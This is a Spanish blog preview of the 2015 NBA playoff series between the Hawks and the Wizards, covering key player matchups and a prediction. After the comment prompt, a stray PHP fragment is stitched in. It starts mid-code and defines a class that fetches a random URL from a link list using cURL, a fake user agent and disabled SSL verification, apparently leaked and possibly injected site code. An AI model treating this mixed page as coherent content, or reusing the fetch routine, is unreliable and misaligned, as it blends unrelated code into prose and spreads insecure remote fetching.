Previa Hawks vs Wizards

03 de May de 2015 por MagicJohnson32

Apenas unas horas después de haber vivido el cierre de una de las mejores series de primera ronda de la historia ¿cómo encuentra uno ánimos para preparar un análisis previo a la eliminatoria que disputarán desde hoy Hawks y Wizards? ¿Cómo superar la tentación de limitarnos a decir “No os moletéis, esto no le interesa ni a Budenholzer” y, en cambio, elaborar un discurso más o menos razonado que disimule nuestra más absoluta desmotivación? ¿Cómo? Pues pensando que esto son los Playoffs y que de aquí saldrá uno de los finalistas del Este. Hay demasiado en juego, así que es momento de arremangarse y tratar de desentrañar las claves que marcarán el devenir de la semifinal de conferencia entre Hawks y Wizards.

wiz_haw

Sobre el papel, Atlanta acumula todo el favoritismo. El mejor equipo de largo esta regular season en el Este superó con mucha claridad a su rival en los tres primeros compromisos que disputaron esta campaña y únicamente cedió el cuarto, cuando los Hawks reservaron a sus titulares. El estilo de los Hawks, en el que el colectivo y la atención a los detalles priman por encima de cualquier individualidad, contrasta y es especialmente incómodo para los Wizards, equipo no carente de recursos para plantear batalla a cualquiera pero con cierta tendencia a la precipitación y al lapsus defensivo. Decimos que los Hawks son favoritos sobre el papel. No lo son tanto si atendemos a las sensaciones que unos y otros ofrecieron en sus respectivas eliminatorias de primera ronda. Atlanta sufrió más de lo previsto y de lo debido frente a los octavos clasificados del Este, los Nets; Washington, por su parte, barrió a los Raptors, cuartos de la conferencia, y ha podido disfrutar de una semana de descanso para preparar la eliminatoria ante un rival que promete ser mucho más exigente que el equipo canadiense.

Así pues, tendrá las de ganar aquel que imponga su estilo, con lo que el duelo entre Jeff Teague y John Wall se presenta determinante. Son dos bases rapidísimos, con propulsores por piernas e innegable capacidad para anotar, pero su trascendencia en estas series se medirá por el rendimiento que sean capaces de obtener de compañeros como Beal y Korver. Si algo condicionó la eliminatoria ante los Raptors fue el dominio de John Wall sobre Lowry y el jugo que el PG de los Wizards supo extraer de la variable táctica que jugó Wittman con Paul Pierce como 4 abierto (algo que fue posible gracias a la grata sorpresa que supuso Otto Porter). Un reto similar se le presenta ahora a Wall, que en regular season no encontró manera de frenar a Teague y se halla ante la oportunidad de redimirse.

Igualmente interesante resultará el duelo en el frontcourt. Millsap y Horford, excelentes todo el curso, llegan renqueantes al tramo decisivo y al duro escollo que supondrán Gortat y Nené. La relativa caída en el rendimiento de la pareja interior de Atlanta la está compensado DeMarre Carroll. Al alero, máximo anotador de los Hawks en primera ronda, le corresponderá una misión capital para los Hawks, la de neutralizar al recién coronado King of the North, Paul Pierce.

En definitiva, y aunque poco importan las expectativas, los precedentes, las estadísticas y los balances de regular season, vemos a los Hawks en condiciones de hacer efectiva su condición de favoritos, su solidez y fe ciega en el modelo Popov… perdón, Budenholzer y llevarse la serie. Aunque no nos extrañaría que se llegase al séptimo partido. Al fin y al cabo no le vendría mal algo de emoción al Este.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>